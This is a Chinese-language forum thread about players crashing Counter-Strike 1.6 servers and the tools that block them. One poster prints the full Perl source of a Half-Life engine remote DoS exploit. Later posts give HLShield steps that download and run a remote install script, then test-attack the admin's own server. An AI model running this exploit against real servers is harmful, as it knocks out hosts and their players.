真的有群踢服务器人的脚本？

Leya

不对啊 他用的不是pera脚本 而是单纯的控制台命令而已
所以才感觉很奇怪
他也说他 只有用他制作的版本没问题 别人制作的DOD版本都被踢  还说正版也存在这个问题

gearfox

那个pera脚本获得很简单的

如果你想要 明天我送你一份。

Leya

我觉得不是pera脚本吧:cry:   我知道这个可以攻击服务器

但是看他介绍应该是用控制台的，因为你看他介绍的，多按几次F8，意思就是说他绑定一个脚本

所以根据推测绝对不是pera脚本

liuyg754021

我的分析肯定是绑了一个脚本！！至于什么脚本我就不清楚了！只想知道如何的防止！！急！急！急！望老大们能找到一个好的办法阻止！！他做的版本我看过了貌似没什么特别之处！难道是修改了某个文件！！

gearfox

急什么急？？？
办法都教给你们了。。

攻击源码是perl的脚本

#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server

use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if(fork()) {
econnect($host);
} else {
econnect($host);
};

exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}

gearfox

linux服务器有这个工具
我一直在用
http://hobby.sarichioi.com/index.php?topic=8.0

What is HLShield

HLShield is a small library, which are injected in Half Life engine, to protect it against exploits, including against CSDOS.

HLShield features


block any CSDOS attack, including modified versions
block "born to be pig" exploit
block the scripts which attempt to "fill" the server with fake players
can to remove some kind of characters from player nickname, like "`" or "~"
allow sending a funny message to attacker
logging attacks, including IP and kind of attack
very easy install/update, based on automatically installing script

How to install


log on to server (ssh or console)
go to cstrike directory (where hlds_run is)
execute the following code:

Code:
wget http://hobby.sarichioi.com/cstrike/hlshield-install.sh
chmod 755 hlshield-install.sh
./hlshield-install.sh


restart Counter Strike server
check that after restart you see in console something like this:


Code:
[AMXX] Loaded 28 admins from file
HLShield[10062]: HLShield 1.11 - (c) 2007 by Serghei Amelian
Master server communication disabled.

download CSDOS script from here
attack your server, for checking:


Code:
perl csdos.pl IP.SERVER

if everything are ok, you must to see in /var/log/daemon.log (or in console) something like this:


Code:
Jan 26 11:26:48 gw HLShield[28563]: rejected atack from ATTACKER.IP

gearfox

至于他用的  说不来到底是什么脚本了

hlds crash 的脚本以前下载过一个 删除掉了

y543685085

拿这个卖钱..真的不知道是什么心态.

gearfox

windows防御的工具 http://www.awakelgcc.narod.ru/downloads.htm

自行下载安装 说明文件比程序都要大
自己慢慢看 很简单

算了，我还是说一下吧。。。

这个工具叫 HLDSGuard v1.4.3 PRO

把附件解压开 放hlds的根目录下 就可以了
开启开启hlds.exe或者批处理方式都支持

gearfox

再介绍一个工具  AntiCSDoS

下载地址我的网盘或者http://shockingsoft.com/soft.php?tip=soft

附件我也上传了一份  

使用方法继续放入hlds根目录中

然后运行AntiCSDoS.exe程序

点patch hlds   然后就ok了

很直观  就不多说了   让用这些脚本搞破坏的go to hell

一点技术含量都没有